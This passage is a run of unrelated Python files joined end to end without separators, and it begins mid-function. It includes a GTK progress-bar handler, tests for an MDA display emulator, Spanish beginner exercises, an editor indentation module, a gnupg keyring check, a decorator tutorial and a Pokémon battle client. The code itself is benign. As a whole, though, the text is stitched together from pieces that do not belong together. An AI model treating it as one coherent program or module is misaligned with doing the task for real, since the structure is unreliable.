                    self.progressbar1.set_text("%s" % self.x)
                    self.progressbar1.set_fraction(self.new_val)
            else:
                return

    def on_togglebutton1_toggled(self, *args):
        # When the toggle button changes state, start the iteration on a
        # worker thread.  (In the original this comment was split across
        # two physical lines, which was a syntax error.)
        variable = self.togglebutton1.get_active()
        self.rango = 100
        if variable:
            lock = thread.allocate_lock()
            lock.acquire()
            thread.start_new_thread(self.__iteracion__, ())
            lock.release()
        else:
            # Freeze the progress bar at its current value.
            self.progressbar1.set_fraction(self.new_val)
            self.progressbar1.set_text("%s" % self.x)




import unittest

from pyxt.mda import *
from pyxt.chargen import CharacterGeneratorMock

class MDATests(unittest.TestCase):
    """Unit tests for pyxt's MonochromeDisplayAdapter (MDA)."""

    def setUp(self):
        self.cg = CharacterGeneratorMock(width = 9, height = 14)
        self.mda = MonochromeDisplayAdapter(self.cg)

        # Hijack reset so it doesn't call into Pygame during the tests.
        self.reset_count = 0
        self.mda.reset = self.reset_testable

    def reset_testable(self):
        self.reset_count += 1

    def test_ports_list(self):
        self.assertEqual(self.mda.get_ports_list(), [0x03B0, 0x03B1, 0x03B2, 0x03B3,
                                                     0x03B4, 0x03B5, 0x03B6, 0x03B7,
                                                     0x03B8, 0x03B9, 0x03BA, 0x03BB])

    def test_get_memory_size(self):
        self.assertEqual(self.mda.get_memory_size(), 4096)

    def test_initial_state(self):
        # The original asserted control_reg twice in a row; the duplicate
        # was dropped (it was presumably copy-pasted and meant to check a
        # different register -- TODO confirm against the adapter class).
        self.assertEqual(self.mda.control_reg, 0x00)
        self.assertEqual(self.mda.screen, None)
        self.assertEqual(self.mda.char_generator, self.cg)
        self.assertEqual(len(self.mda.video_ram), 4096)

    def test_mem_write_byte_updates_video_ram(self):
        self.mda.mem_write_byte(0x0000, 0x41)
        self.assertEqual(self.mda.video_ram[0x0000], 0x41)

    def test_mem_write_byte_calls_char_generator_top_left(self):
        self.mda.mem_write_byte(0x0000, 0x41)
        self.assertEqual(self.cg.last_blit, (None, (0, 0), 0x41, MDA_GREEN, MDA_BLACK))

    def test_mem_write_byte_calls_char_generator_bottom_right(self):
        self.mda.mem_write_byte(3998, 0xFF)
        self.assertEqual(self.cg.last_blit, (None, (711, 336), 0xFF, MDA_GREEN, MDA_BLACK))

    def test_mem_write_byte_char_before_attribute(self):
        self.mda.mem_write_byte(3998, 0xFF)
        self.assertEqual(self.cg.last_blit, (None, (711, 336), 0xFF, MDA_GREEN, MDA_BLACK))
        self.mda.mem_write_byte(3999, MDA_ATTR_INTENSITY)
        self.assertEqual(self.cg.last_blit, (None, (711, 336), 0xFF, MDA_BRIGHT_GREEN, MDA_BLACK))

    def test_mem_write_byte_attribute_before_char(self):
        self.mda.mem_write_byte(3999, MDA_ATTR_INTENSITY)
        self.assertEqual(self.cg.last_blit, (None, (711, 336), 0x00, MDA_BRIGHT_GREEN, MDA_BLACK))
        self.mda.mem_write_byte(3998, 0xFF)
        self.assertEqual(self.cg.last_blit, (None, (711, 336), 0xFF, MDA_BRIGHT_GREEN, MDA_BLACK))

    def test_mem_write_byte_write_off_screen(self):
        self.mda.mem_write_byte(4000, 0xFF)
        self.assertEqual(self.cg.last_blit, None)

    def test_mem_read_byte(self):
        self.mda.video_ram[77] = 0xA5
        self.assertEqual(self.mda.mem_read_byte(77), 0xA5)

    def test_mem_read_byte_off_screen(self):
        self.assertEqual(self.mda.mem_read_byte(4000), 0x00)

    @unittest.skip("We need to initialize Pygame exactly once at startup.")
    def test_reset_on_high_resolution_enable(self):
        self.assertEqual(self.reset_count, 0)

        self.mda.io_write_byte(0x3B8, 0x01)
        self.assertEqual(self.reset_count, 1)

        # Second write shouldn't call reset again.
        self.mda.io_write_byte(0x3B8, 0x01)
        self.assertEqual(self.reset_count, 1)

    def test_mem_write_word_at_top_left(self):
        self.mda.mem_write_word(0x0000, 0x0841) # 'A' with intensity.
        self.assertEqual(self.mda.video_ram[0x0000], 0x41)
        self.assertEqual(self.mda.video_ram[0x0001], 0x08)
        self.assertEqual(self.cg.last_blit, (None, (0, 0), 0x41, MDA_BRIGHT_GREEN, MDA_BLACK))

    def test_mem_write_word_at_bottom_right(self):
        self.mda.mem_write_word(3998, 0x085A) # 'Z' with intensity.
        self.assertEqual(self.mda.video_ram[3998], 0x5A)
        self.assertEqual(self.mda.video_ram[3999], 0x08)
        self.assertEqual(self.cg.last_blit, (None, (711, 336), 0x5A, MDA_BRIGHT_GREEN, MDA_BLACK))

    def test_mem_write_word_at_bottom_right_just_past(self):
        # Only the low byte (0x08) lands in the last VRAM cell; the high
        # byte falls off the end of video memory.  (The original comment
        # "'Z' with intensity." was a copy-paste error.)
        self.mda.mem_write_word(3999, 0xFF08)
        self.assertEqual(self.mda.video_ram[3998], 0x00) # Should be unmodified.
        self.assertEqual(self.mda.video_ram[3999], 0x08)
        self.assertEqual(self.cg.last_blit, (None, (711, 336), 0x00, MDA_BRIGHT_GREEN, MDA_BLACK))

    def test_mem_read_word(self):
        self.mda.video_ram[0x0000] = 0x41
        self.mda.video_ram[0x0001] = 0x08
        self.assertEqual(self.mda.mem_read_word(0x0000), 0x0841)

    def test_mem_read_word_just_past_the_end(self):
        self.mda.video_ram[3998] = 0x12
        self.mda.video_ram[3999] = 0x34
        self.assertEqual(self.mda.mem_read_word(3999), 0x0034)

    def test_horizontal_retrace_toggles(self):
        self.assertEqual(self.mda.io_read_byte(0x3BA), 0xF0)
        self.assertEqual(self.mda.io_read_byte(0x3BA), 0xF1)
        self.assertEqual(self.mda.io_read_byte(0x3BA), 0xF0)

    def test_current_pixel_updates_on_status_read(self):
        self.assertEqual(self.mda.current_pixel, [0, 0])
        self.mda.io_read_byte(0x3BA)
        self.assertEqual(self.mda.current_pixel, [1, 0])

    def test_current_pixel_wraps_right(self):
        self.mda.current_pixel = [719, 0]
        self.mda.io_read_byte(0x3BA)
        self.assertEqual(self.mda.current_pixel, [0, 1])

    def test_current_pixel_wraps_bottom(self):
        self.mda.current_pixel = [719, 349]
        self.mda.io_read_byte(0x3BA)
        self.assertEqual(self.mda.current_pixel, [0, 0])
        
import urllib2


def sumaDos():
    """Print the product 10 * 20 (despite the name, this multiplies)."""
    producto = 10 * 20
    print(producto)
def division(a, b):
    """Print the quotient of a and b; raises ZeroDivisionError if b == 0."""
    cociente = a / b
    print(cociente)

def areatriangulo(base, altura):
    """Print the area of a triangle given its base and height."""
    area = (base * altura) / 2
    print(area)

def cast():
    """Demonstrate basic container types and print the demo dict's items.

    Fixes from the original: the dict was defined as ``diccinario`` but
    iterated as ``diccionario`` (NameError), and iterating a dict yields
    only keys, so unpacking ``k, v`` requires ``.items()``.
    """
    lista = [1, 2, 3, "hola"]   # list (illustrative, unused)
    tupla = (1, 2, 3)           # tuple (illustrative, unused)
    diccionario = {"key1": "Diego", "key2": "Piqui", "key3": "Chuy"}
    for k, v in diccionario.items():
        print("%s %s" % (k, v))


class Estudiante(object):
    """A student with a name and an age.

    The original dedented the methods to module level (a syntax error)
    and returned the undefined names ``true``/``false``.
    """

    def __init__(self, nombre, edad):
        self.nombre = nombre
        self.edad = edad

    def hola(self):
        """Return the student's name."""
        return self.nombre

    def esMayor(self):
        """Return True if the student is an adult (age >= 18)."""
        return self.edad >= 18
def EXCEPTION():
    """Demonstrate exception handling: divide by zero and print "error".

    The original indented the ``except`` clause deeper than its ``try``,
    which was a syntax error; it also caught the overly broad
    ``Exception`` where only ZeroDivisionError can occur.
    """
    try:
        3 / 0
    except ZeroDivisionError:
        print("error")
def main():
    """Exercise the Estudiante class, then count from 0 to 10.

    The original nested the ``else`` inside the ``if`` body (a syntax
    error); it is re-paired with the ``if`` here.
    """
    e = Estudiante("Diego", 22)
    print("Hola %s" % e.hola())
    if e.esMayor():
        print("Es mayor de edad")
    else:
        print("Es menor de edad")

    contador = 0
    while contador <= 10:
        print(contador)
        contador += 1
# Run the exception demo at import time.  The original read
# ``EXCEPTION():`` -- the stray trailing colon was a syntax error.
EXCEPTION()
def getWeb():
    """Fetch and print http://itjiquilpan.edu.mx/, printing any error.

    The original indented the ``except`` clauses deeper than the ``try``
    (a syntax error) and used the legacy ``except E, e`` comma syntax.
    HTTPError must stay before URLError: it is a subclass of URLError.
    """
    try:
        web = urllib2.urlopen("http://itjiquilpan.edu.mx/")
        print(web.read())
        web.close()
    except urllib2.HTTPError as e:
        print(e)
    except urllib2.URLError as e:
        print(e)
def main():
    """Entry point: run the container-types demo."""
    # NOTE(review): this redefines the main() declared earlier in the
    # file, so only this version is reachable from the __main__ guard.
    cast()
    

# Run the demo only when executed as a script, not on import.
if __name__ == "__main__":
    main()
    


    



"""Module computes indentation for block
It contains implementation of indenters, which are supported by katepart xml files
"""

import logging

logger = logging.getLogger('qutepart')


from PyQt4.QtGui import QTextCursor


def _getSmartIndenter(indenterName, qpart, indenter):
    """Get indenter by name.
    Available indenters are none, normal, cstyle, haskell, lilypond, lisp, python, ruby, xml
    Indenter name is not case sensitive
    Raise KeyError if not found
    indentText is indentation, which shall be used. i.e. '\t' for tabs, '    ' for 4 space symbols
    """
    indenterName = indenterName.lower()

    if indenterName in ('haskell', 'lilypond'):  # not supported yet
        logger.warning('Smart indentation for %s not supported yet. But you could be a hero who implemented it' % indenterName)
        from qutepart.indenter.base import IndentAlgNormal as indenterClass
    elif 'none' == indenterName:
        from qutepart.indenter.base import IndentAlgBase as indenterClass
    elif 'normal' == indenterName:
        from qutepart.indenter.base import IndentAlgNormal as indenterClass
    elif 'cstyle' == indenterName:
        from qutepart.indenter.cstyle import IndentAlgCStyle as indenterClass
    elif 'python' == indenterName:
        from qutepart.indenter.python import IndentAlgPython as indenterClass
    elif 'ruby' == indenterName:
        from qutepart.indenter.ruby import IndentAlgRuby as indenterClass
    elif 'xml' == indenterName:
        from qutepart.indenter.xmlindent import IndentAlgXml as indenterClass
    elif 'haskell' == indenterName:
        from qutepart.indenter.haskell import IndenterHaskell as indenterClass
    elif 'lilypond' == indenterName:
        from qutepart.indenter.lilypond import IndenterLilypond as indenterClass
    elif 'lisp' == indenterName:
        from qutepart.indenter.lisp import IndentAlgLisp as indenterClass
    elif 'scheme' == indenterName:
        from qutepart.indenter.scheme import IndentAlgScheme as indenterClass
    else:
        raise KeyError("Indenter %s not found" % indenterName)

    return indenterClass(qpart, indenter)


class Indenter:
    """Qutepart functionality, related to indentation

    Public attributes:
        width           Indent width
        useTabs         Indent uses Tabs (instead of spaces)
    """
    # Defaults used until the host application overrides width/useTabs.
    _DEFAULT_INDENT_WIDTH = 4
    _DEFAULT_INDENT_USE_TABS = False

    def __init__(self, qpart):
        self._qpart = qpart

        self.width = self._DEFAULT_INDENT_WIDTH
        self.useTabs = self._DEFAULT_INDENT_USE_TABS

        # Start with the 'normal' algorithm until setSyntax() picks one.
        self._smartIndenter = _getSmartIndenter('normal', self._qpart, self)

    def setSyntax(self, syntax):
        """Choose smart indentation algorithm according to syntax"""
        self._smartIndenter = self._chooseSmartIndenter(syntax)

    def text(self):
        """Get indent text as \t or string of spaces
        """
        if self.useTabs:
            return '\t'
        else:
            return ' ' * self.width

    def triggerCharacters(self):
        """Trigger characters for smart indentation"""
        return self._smartIndenter.TRIGGER_CHARACTERS

    def autoIndentBlock(self, block, char = '\n'):
        """Indent block after Enter pressed or trigger character typed
        """
        cursor = QTextCursor(block)
        currentText = block.text()
        # Length of the block's existing leading whitespace.
        spaceAtStartLen = len(currentText) - len(currentText.lstrip())
        currentIndent = currentText[:spaceAtStartLen]
        indent = self._smartIndenter.computeIndent(block, char)
        # Only touch the document if the computed indent actually differs.
        if indent is not None and indent != currentIndent:
            self._qpart.replaceText(block.position(), spaceAtStartLen, indent)

    def onChangeSelectedBlocksIndent(self, increase, withSpace=False):
        """Tab or Space pressed and few blocks are selected, or Shift+Tab pressed
        Insert or remove text from the beginning of blocks
        """
        # Return the leading-whitespace prefix of a block.
        def blockIndentation(block):
            text = block.text()
            return text[:len(text) - len(text.lstrip())]

        # Cursor positioned just after a block's leading whitespace.
        def cursorAtSpaceEnd(block):
            cursor = QTextCursor(block)
            cursor.setPosition(block.position() + len(blockIndentation(block)))
            return cursor

        def indentBlock(block):
            cursor = cursorAtSpaceEnd(block)
            cursor.insertText(' ' if withSpace else self.text())

        # Count trailing spaces of the indent string.
        def spacesCount(text):
            return len(text) - len(text.rstrip(' '))

        def unIndentBlock(block):
            currentIndent = blockIndentation(block)

            if currentIndent.endswith('\t'):
                charsToRemove = 1
            elif withSpace:
                charsToRemove = 1 if currentIndent else 0
            else:
                if self.useTabs:
                    charsToRemove = min(spacesCount(currentIndent), self.width)
                else:  # spaces
                    if currentIndent.endswith(self.text()):  # remove indent level
                        charsToRemove = self.width
                    else:  # remove all spaces
                        charsToRemove = min(spacesCount(currentIndent), self.width)

            if charsToRemove:
                cursor = cursorAtSpaceEnd(block)
                cursor.setPosition(cursor.position() - charsToRemove, QTextCursor.KeepAnchor)
                cursor.removeSelectedText()

        cursor = self._qpart.textCursor()

        startBlock = self._qpart.document().findBlock(cursor.selectionStart())
        endBlock = self._qpart.document().findBlock(cursor.selectionEnd())
        # If end is positioned in the beginning of a block, do not indent this
        # block, since no text is selected in it (beginning of line)
        if endBlock.position()==cursor.selectionEnd():
            endBlock=endBlock.previous()

        indentFunc = indentBlock if increase else unIndentBlock

        if startBlock != endBlock:  # indent multiply lines
            stopBlock = endBlock.next()

            block = startBlock

            # `with self._qpart` groups the edits into one undo step.
            with self._qpart:
                while block != stopBlock:
                    indentFunc(block)
                    block = block.next()

            # Re-select the whole indented range.
            newCursor = QTextCursor(startBlock)
            newCursor.setPosition(endBlock.position() + len(endBlock.text()), QTextCursor.KeepAnchor)
            self._qpart.setTextCursor(newCursor)
        else:  # indent 1 line
            indentFunc(startBlock)

    def onShortcutIndentAfterCursor(self):
        """Tab pressed and no selection. Insert text after cursor
        """
        cursor = self._qpart.textCursor()

        def insertIndent():
            if self.useTabs:
                cursor.insertText('\t')
            else:  # indent to integer count of indents from line start
                charsToInsert = self.width - (len(self._qpart.textBeforeCursor()) % self.width)
                cursor.insertText(' ' * charsToInsert)

        if cursor.positionInBlock() == 0:  # if no any indent - indent smartly
            block = cursor.block()
            self.autoIndentBlock(block, '')

            # if no smart indentation - just insert one indent
            if self._qpart.textBeforeCursor() == '':
                insertIndent()
        else:
            insertIndent()


    def onShortcutUnindentWithBackspace(self):
        """Backspace pressed, unindent
        """
        assert self._qpart.textBeforeCursor().endswith(self.text())

        # Remove back to the previous indent-width boundary (a full level
        # when already exactly on a boundary).
        charsToRemove = len(self._qpart.textBeforeCursor()) % len(self.text())
        if charsToRemove == 0:
            charsToRemove = len(self.text())

        cursor = self._qpart.textCursor()
        cursor.setPosition(cursor.position() - charsToRemove, QTextCursor.KeepAnchor)
        cursor.removeSelectedText()

    def onAutoIndentTriggered(self):
        """Indent current line or selected lines
        """
        cursor = self._qpart.textCursor()

        startBlock = self._qpart.document().findBlock(cursor.selectionStart())
        endBlock = self._qpart.document().findBlock(cursor.selectionEnd())

        if startBlock != endBlock:  # indent multiply lines
            stopBlock = endBlock.next()

            block = startBlock

            with self._qpart:
                while block != stopBlock:
                    self.autoIndentBlock(block, '')
                    block = block.next()
        else:  # indent 1 line
            self.autoIndentBlock(startBlock, '')

    def _chooseSmartIndenter(self, syntax):
        """Get indenter for syntax
        """
        # Preference order: the syntax's declared indenter, then one
        # matching the syntax name, then the 'normal' fallback.
        if syntax.indenter is not None:
            try:
                return _getSmartIndenter(syntax.indenter, self._qpart, self)
            except KeyError:
                logger.error("Indenter '%s' is not finished yet. But you can do it!" % syntax.indenter)

        try:
            return _getSmartIndenter(syntax.name, self._qpart, self)
        except KeyError:
            pass

        return _getSmartIndenter('normal', self._qpart, self)

'''Manual check (not a discoverable unit test) for the key import,
   to identify problems with gnupg, gpg, gpg1, gpg2 and so on'''

import os
import shutil
from gnupg import GPG

def setup_keyring(keyring_name):
    """Create a fresh GPG keyring and import the test key pair into it.

    Args:
        keyring_name: directory name under test/outputdata for the keyring.

    Returns:
        The configured gnupg.GPG instance.
    """
    keyring_path = os.path.join("test", "outputdata", keyring_name)
    # Delete the entire keyring so every run starts from a clean state.
    shutil.rmtree(keyring_path, ignore_errors=True)
    os.makedirs(keyring_path)
    gpg = GPG(gnupghome=keyring_path, gpgbinary="gpg")
    for key_name in ["key1_private", "key1_public"]:
        # read() replaces the original "".join(readlines()) round-trip.
        with open(os.path.join("test", "inputdata", key_name + ".txt"), "r") as keyfile:
            key_str = keyfile.read()
        import_result = gpg.import_keys(key_str)
        print("Import result:", type(import_result))
        print(import_result.__dict__)
        if import_result.count == 1 and len(set(import_result.fingerprints)) == 1:
            print("Got one import result")
    return gpg

# Build the keyring once at import time and sanity-check the key counts.
CRYPTO = setup_keyring("keyringtest")
if CRYPTO:
    print("Ready", CRYPTO)
# list_keys(False) lists public keys.
KEY_LIST = CRYPTO.list_keys(False)
NUM_KEYS = len(KEY_LIST) if KEY_LIST else 0
print("Number of public keys:", NUM_KEYS)
if NUM_KEYS < 1:
    print("ERROR: Number of keys should be 1, not", NUM_KEYS)
# list_keys(True) lists private (secret) keys.
KEY_LIST = CRYPTO.list_keys(True)
NUM_KEYS = len(KEY_LIST) if KEY_LIST else 0
print("Number of private keys:", NUM_KEYS)
if NUM_KEYS < 1:
    print("ERROR: Number of keys should be 1, not", NUM_KEYS)

#!/usr/bin/python
"""
Since functions are function instances you can wrap them

Allow you to
- modify arguments
- modify function
- modify results
"""
# Number of times any @count-decorated function has been invoked.
call_count = 0


def count(func):
    """Wrap *func* so each call bumps the module-global ``call_count``,
    forwarding all arguments and the return value unchanged."""
    def wrapper(*args, **kw):
        global call_count
        call_count = call_count + 1
        return func(*args, **kw)
    return wrapper

def hello():
    """Print a fixed greeting; used as the decorator demo target."""
    print('Invoked hello')

# Decorate hello so every call increments call_count, then demonstrate.
hello = count(hello)

hello()
print(call_count)
hello()
print(call_count)

"""
## Syntactic Sugar

>>> @count
... def hello():
...     print "Invoked hello"

equals

hello = count(hello)


## Syntactic Sugar 2
Don't add parens to the decorator
>>> @count()
... def hello():
...     print "Invoked hello"
... 
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: count() takes exactly 1 argument (0 given)
>>> 

##Decorator Template
def decorator(func_to_decorate):
	def wrapper(*args, **kwargs):
		# do something before invocation
		result = func_to_decorate(*args,**kwargs)
		# do something after invocation
		return result
	#update wrapper.__doc__ and .func_name
	# or functools.wraps	
	return wrapper	

##Decorators can also be classes, to have a class that Decorates
class decorator(object):
	def __init__(self, function):
		self.function = function
	def __call__(self, *args, **kw):
		# do something before invocation
		result = self.function(*args, **kw)
		# do something after
		return result	

##Decorators can also be classes 2, to have a instance that Decorates
class decorator(object):
	def __init__(self, function):
		self.function = function
	def __call__(self, *args, **kw):
		def wrapper(*args, **kw):
			# do something before invocation
			result = self.function(*args, **kw)
			# do something after
			return result	
		return wrapper

## The above lets you have an instance of a decorator that stores state
(rather than using global state)	

## Parameterized decorators (need 2 closures)
def limit(length):
	def decorator(function):
		def wrapper(*args, **kw):
			result = function(*args, **kw)
			result = result[:length]
			return result
		return wrapper
	return decorator			

>>> @limit(5)  ## Decorating the simple function echo with limit 5 as parameter
... def echo(foo):
...     return foo
... 
>>> echo ('123456')
'12345'
>>> 
Or you can use following as well , to limit the echo function with 3 as parameter
>>> echo = limit(3)(echo)
>>> echo ('123456')
'123'
>>> 

## Decorator Tidying

function attributes get mangled
>>> def echo2(input):
...     ###return input###  I used ### instead of 3  coz that was causing some error
...     return input
... 
>>> echo2.__doc__
'return input'
>>> echo2.func_name
'echo2'
>>> 
>>> echo3 = limit(3)(echo2)
>>> echo3.__doc__
>>> echo3.func_name
'wrapper'
>>> 

#Now to fix above define your limit decorator as below
def limit(length):
	def decorator(function):
		def wrapper(*args, **kw):
			result = function(*args, **kw)
			result = result[:length]
			return result
		wrapper.__doc__ = function.__doc__
		wrapper.func_name = function.func_name	
		return wrapper
	return decorator

>>> echo4 = limit(3)(echo2)
>>> echo4.__doc__
'return input'
>>> echo4.func_name
'echo2'
>>> 

#Decorator tidying (3) , using functools , more simple
import functools
def limit(length):
	def decorator(function):
		@functools.wraps(function)
		def wrapper(*args, **kw):
			result = function(*args, **kw)
			result = result[:length]
			return result
		#wrapper.__doc__ = function.__doc__
		#wrapper.func_name = function.func_name	
		return wrapper
	return decorator


Uses for decorator

- caching
- monkey patching stdio
- memoize
- jsonify
- logging time in function call
- change cwd
"""

def cwd_decorator(func):
    """Decorator: run *func* with the cwd set to the directory of the
    first ``.rst`` file named on the command line, restoring the old
    cwd afterwards.

    Fixes over the original: ``sys`` was never imported in this file
    (NameError on the first call); the target directory was taken from
    the leftover loop variable ``arg`` instead of the matched value; and
    the old cwd is now restored even if *func* raises.
    """
    def wrapper(*args, **kw):
        import os
        import sys
        cur_dir = os.getcwd()
        rst_path = None
        for candidate in sys.argv:
            if candidate.endswith(".rst"):
                rst_path = candidate
                break
        if rst_path:
            directory = os.path.dirname(rst_path)
            if directory:
                os.chdir(directory)
        try:
            return func(*args, **kw)
        finally:
            os.chdir(cur_dir)
    return wrapper

"""
###
Properties
Call get/set methods via instance attributes
class C(object):
	def getx(self):
		return self._x
	def setx(self, value):
		self._x = value
	def delx(self):
		del self._x
	x = property(getx, setx, delx, "I'm the 'x' property.")
	
from property.__doc__

"""				
import os
def find_files(base_dir, recurse=True):
    """Yield the paths of entries found under *base_dir*.

    Directories are descended into (and not yielded) when *recurse* is
    true; otherwise every directory entry is yielded as-is.
    """
    for entry in os.listdir(base_dir):
        full_path = os.path.join(base_dir, entry)
        if not (recurse and os.path.isdir(full_path)):
            yield full_path
        else:
            for nested in find_files(full_path, recurse):
                yield nested



# float('Inf') compares greater than every finite number.
my_inf = float('Inf')
print(99999999 > my_inf)
# False

# Likewise float('-Inf') compares less than every finite number.
my_neg_inf = float('-Inf')
print(my_neg_inf < -99999999)
# True

import xml.etree.ElementTree as ET
import requests
from flask import Flask
import batalha
import pokemon
import ataque

class Cliente:
	"""Battle client: serialises a pokemon to XML, posts it to the battle
	server over HTTP and replays the battle turn by turn.

	NOTE(review): user-facing strings are intentionally left in
	Portuguese; only comments were translated.
	"""

	def __init__(self, execute = False, ip = '127.0.0.1', port = 5000, npc = False):
		# npc=True makes this client pick its moves automatically.
		self.ip = ip
		self.port = port
		self.npc = npc
		if (execute):
			self.iniciaBatalha()


	def writeXML(self, pkmn):
		# Build the <battle_state> XML document from a pokemon object
		# and return it as a string.
		root = ET.Element('battle_state')
		ET.SubElement(root, "pokemon")
		poke = root.find('pokemon')

		ET.SubElement(poke, "name")
		poke.find('name').text = pkmn.getNome()

		ET.SubElement(poke, "level")
		poke.find('level').text = str(pkmn.getLvl())

		ET.SubElement(poke, "attributes")
		poke_att = poke.find('attributes')
		
		ET.SubElement(poke_att, "health")
		poke_att.find('health').text = str(pkmn.getHp())
		
		ET.SubElement(poke_att, "attack")
		poke_att.find('attack').text = str(pkmn.getAtk())
		
		ET.SubElement(poke_att, "defense")
		poke_att.find('defense').text = str(pkmn.getDefe())
		
		ET.SubElement(poke_att, "speed")
		poke_att.find('speed').text = str(pkmn.getSpd())
		
		ET.SubElement(poke_att, "special")
		poke_att.find('special').text = str(pkmn.getSpc())


		# Two <type> elements: primary and secondary type.
		ET.SubElement(poke, "type")
		ET.SubElement(poke, "type")
		tipos = poke.findall('type')
		tipos[0].text = str(pkmn.getTyp1())
		tipos[1].text = str(pkmn.getTyp2())
		
		# One <attacks> element per known attack (up to 4 slots).
		for i in range(0, 4):
			atk = pkmn.getAtks(i)
			if (atk is not None):
				ET.SubElement(poke, "attacks")
				poke_atk = poke.findall('attacks')

				ET.SubElement(poke_atk[-1], "id")
				poke_atk[-1].find('id').text = str(i + 1)

				ET.SubElement(poke_atk[-1], "name")
				poke_atk[-1].find('name').text = atk.getNome()
				
				ET.SubElement(poke_atk[-1], "type")
				poke_atk[-1].find('type').text = str(atk.getTyp())
				
				ET.SubElement(poke_atk[-1], "power")
				poke_atk[-1].find('power').text = str(atk.getPwr())
			
				ET.SubElement(poke_atk[-1], "accuracy")
				poke_atk[-1].find('accuracy').text = str(atk.getAcu())

				ET.SubElement(poke_atk[-1], "power_points")      
				poke_atk[-1].find('power_points').text = str(atk.getPpAtual())


		s = ET.tostring(root)
		return s

	def iniciaBatalha(self):
		# Start a battle: send our pokemon to the server and set up the
		# local battle with our pokemon plus the server's reply.
		pkmn = pokemon.Pokemon()
		xml = self.writeXML(pkmn)
		try:
			self.battle_state = requests.post('http://{}:{}/battle/'.format(self.ip, self.port), data = xml).text
		except requests.exceptions.ConnectionError:
			print("Não foi possível conectar ao servidor.")
			return None
		pkmn2 = pokemon.lePokemonXML(1, self.battle_state)
		self.batalha = batalha.Batalha([pkmn, pkmn2])
		if (self.npc): 
			self.batalha.pkmn[0].npc = True
			print("Eu sou um NPC")
		self.batalha.turno = 0
		self.batalha.display.showPokemon(self.batalha.pkmn[0])
		self.batalha.display.showPokemon(self.batalha.pkmn[1])
		return self.atualizaBatalha()

	def atualizaBatalha(self):
		# Play one turn: sync HP from the server's battle_state, choose
		# and send an attack, then recurse until the battle is over.
		self.batalha.AlternaTurno()
		root = ET.fromstring(self.battle_state)
		for i in range(0,2):
			pkmnXML = root[i]
			atksXML = root[i].findall('attacks')
			pkmn = self.batalha.pkmn[i]
			pkmn.setHpAtual(int(pkmnXML.find('attributes').find('health').text))

		self.batalha.showStatus()

		if (not self.batalha.isOver()):
			self.batalha.AlternaTurno()
			if (self.batalha.pkmn[self.batalha.turno].npc):
				id = self.batalha.EscolheAtaqueInteligente()
			else:
				id = self.batalha.EscolheAtaque()
			self.batalha.pkmn[0].getAtks(id).decreasePp()
			# id == 4 means Struggle, sent to the server as attack 0.
			if (id == 4):
				self.battle_state = requests.post('http://{}:{}/battle/attack/{}'.format(self.ip, self.port, 0)).text
			else:
				self.battle_state = requests.post('http://{}:{}/battle/attack/{}'.format(self.ip, self.port, id + 1)).text
			self.simulaAtaque(id)
			self.atualizaBatalha()

		else: 
			self.batalha.showResults()

		return 'FIM'

	def sendShutdownSignal(self):
		# Ask the battle server to shut itself down.
		requests.post('http://{}:{}/shutdown'.format(self.ip, self.port))

	def simulaAtaque(self, idCliente):
		# Replay both sides' attacks locally, deriving the damage dealt
		# from the HP deltas in the server's new battle_state.
		# id 4 is Struggle, which also hurts its user (half the damage).
		disp = self.batalha.display
		root = ET.fromstring(self.battle_state)

		pkmnCXML = root[0]
		pkmnC = self.batalha.pkmn[0]

		pkmnSXML = root[1]
		pkmnS = self.batalha.pkmn[1]
		atksXML = pkmnSXML.findall('attacks')
		idServidor = self.descobreAtaqueUsado(atksXML, pkmnS)

		# Server pokemon still standing: both sides attacked.
		if (int(pkmnSXML.find('attributes').find('health').text) > 0):

			if (idCliente != 4):
				if (idServidor != 4):

					dmg = pkmnS.getHpAtual() - int(pkmnSXML.find('attributes').find('health').text)
					if (dmg == 0):
						disp.miss(pkmnC, pkmnS, pkmnC.getAtks(idCliente))
					else:
						disp.hit(pkmnC, pkmnS, pkmnC.getAtks(idCliente), dmg)

					dmg = pkmnC.getHpAtual() - int(pkmnCXML.find('attributes').find('health').text)
					if (dmg == 0):
						disp.miss(pkmnS, pkmnC, pkmnS.getAtks(idServidor))
					else:
						disp.hit(pkmnS, pkmnC, pkmnS.getAtks(idServidor), dmg)

				else:
					# Server used Struggle: its recoil is half the damage
					# it dealt to us.
					dmgStruggle = pkmnC.getHpAtual() - int(pkmnCXML.find('attributes').find('health').text)

					dmg = pkmnS.getHpAtual() - int(pkmnSXML.find('attributes').find('health').text) + round(dmgStruggle / 2, 0)
					if (dmg == 0):
						disp.miss(pkmnC, pkmnS, pkmnC.getAtks(idCliente))
					else:
						disp.hit(pkmnC, pkmnS, pkmnC.getAtks(idCliente), dmg)

					disp.hit(pkmnS, pkmnC, pkmnS.getAtks(idServidor), dmgStruggle)
					disp.hitSelf(pkmnS, round(dmgStruggle / 2, 0))

			else:
				if (idServidor != 4):
					# We used Struggle: our recoil is half what we dealt.
					dmgStruggle = pkmnS.getHpAtual() - int(pkmnSXML.find('attributes').find('health').text)

					disp.hit(pkmnC, pkmnS, pkmnC.getAtks(idCliente), dmgStruggle)
					disp.hitSelf(pkmnC, round(dmgStruggle / 2, 0))

					dmg = pkmnC.getHpAtual() - int(pkmnCXML.find('attributes').find('health').text) + round(dmgStruggle / 2, 0)
					if (dmg == 0):
						disp.miss(pkmnS, pkmnC, pkmnS.getAtks(idServidor))
					else:
						disp.hit(pkmnS, pkmnC, pkmnS.getAtks(idServidor), dmg)

				else:
					print('Ambos usam e se machucam com Struggle!')

		else:
			# Server pokemon fainted: only our attack landed this turn.

			if (idCliente != 4):

				dmg = pkmnS.getHpAtual() - int(pkmnSXML.find('attributes').find('health').text)
				if (dmg == 0):
					disp.miss(pkmnC, pkmnS, pkmnC.getAtks(idCliente))
				else:
					disp.hit(pkmnC, pkmnS, pkmnC.getAtks(idCliente), dmg)

			else:
				dmgStruggle = pkmnC.getHpAtual() - int(pkmnCXML.find('attributes').find('health').text)

				disp.hit(pkmnC, pkmnS, pkmnC.getAtks(idServidor), dmgStruggle * 2)
				disp.hitSelf(pkmnC, round(dmgStruggle, 0))

	def descobreAtaqueUsado(self, atksXML, pkmn):
		# Work out which attack the server used by comparing each slot's
		# PP in the XML with our local copy; sync the local PP when found.
		for i in range(0, len(atksXML)):
			id = int(atksXML[i].find('id').text) - 1 
			ppXML = int(atksXML[i].find('power_points').text)
			pp = pkmn.getAtks(id).getPpAtual()

			if (pp != ppXML):
				pkmn.getAtks(id).decreasePp()
				return id

		# NOTE(review): if no PP differs, this falls through and returns
		# the last loop value of `id` -- presumably intentional fallback,
		# but worth confirming.
		return id








